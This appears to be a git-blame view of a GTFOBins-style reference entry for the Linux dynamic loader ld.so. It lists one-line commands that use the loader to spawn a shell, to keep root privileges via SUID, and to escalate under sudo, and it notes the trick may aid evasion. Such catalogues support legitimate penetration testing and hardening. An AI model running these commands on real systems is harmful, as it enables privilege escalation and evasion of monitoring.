2018-05-21 21:14:41 +02:00
---
2018-05-22 12:40:35 +02:00
description: |
2018-09-06 19:18:22 +02:00
`ld.so` is the Linux dynamic linker/loader, its filename and location might change across distributions. The proper path is can be obtained with:
2018-05-22 12:40:35 +02:00
```
$ strings /proc/self/exe | head -1
/lib64/ld-linux-x86-64.so.2
```
2023-09-02 10:59:17 +02:00
It's worth noting that the spawned process will be the loader, not the target executable, this might aid evasion. See https://shyft.us/posts/20230526_linux_command_proxy.html for more information.
2018-05-21 21:14:41 +02:00
functions:
2018-10-05 19:55:38 +02:00
shell:
2018-07-16 15:01:50 +02:00
- code: /lib/ld.so /bin/sh
2018-10-05 19:55:38 +02:00
suid:
2018-07-16 15:01:50 +02:00
- code: ./ld.so /bin/sh -p
2018-10-05 19:55:38 +02:00
sudo:
2018-07-16 15:01:50 +02:00
- code: sudo /lib/ld.so /bin/sh
2018-05-21 21:14:41 +02:00
---